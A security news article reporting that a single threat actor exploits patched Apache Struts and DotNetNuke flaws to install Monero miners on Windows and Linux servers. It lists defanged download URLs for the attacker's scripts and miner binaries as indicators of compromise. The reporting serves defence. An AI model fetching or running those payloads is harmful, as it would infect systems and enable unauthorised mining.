Cryptocurrency miners have begun using two older and already patched vulnerabilities to compromise servers to mine the Monero digital currency.
Trend Micro researcher Hubert Lin reported a significant increase in the use of Apache Struts (CVE-2017-5638) and DotNetNuke (CVE-2017-9822) starting in December. So far it's estimated the malicious actor behind the attacks has netted about $12,000 or 30XMR.
“We believe that this is the work of a single threat actor, as the sites all point to a single malicious domain to download Monero miners, which also all point to a single Monero address,” Lin wrote.
An attack starts with a malicious HTTP request being sent to a server and if the server is susceptible the Apache Struts and DotNetNuke flaws are then drafted into running the code. The code's operation eventually leads to the downloading of a Monero miner.
The attacks hit Windows and Linux systems, but Lin noted the URL used to download the miner differs depending upon the operating system involved. However, the same URL is shared between Struts and DotNetuke:
Windows – hxxp://eeme7j[.]win/scv[.]ps1 leading to the download of a miner from hxxp://eeme7j[.]win/mule[.]exe (detected as TROJ_BITMIN.JU)
Linux – hxxp://eeme7j[.]win/larva[.]sh leading to the download of a miner from hxxp://eeme7j[.]win/mule (detected as ELF_BITMIN.AK)
The number of attacks have declined lately, but Lin noted that they have not halted. In part due to the refusal of system administrators to recognize the danger posed by Apache Struts and DotNetNuke and patching their systems. Patches for both issues have been available since March and August 2017, respectively.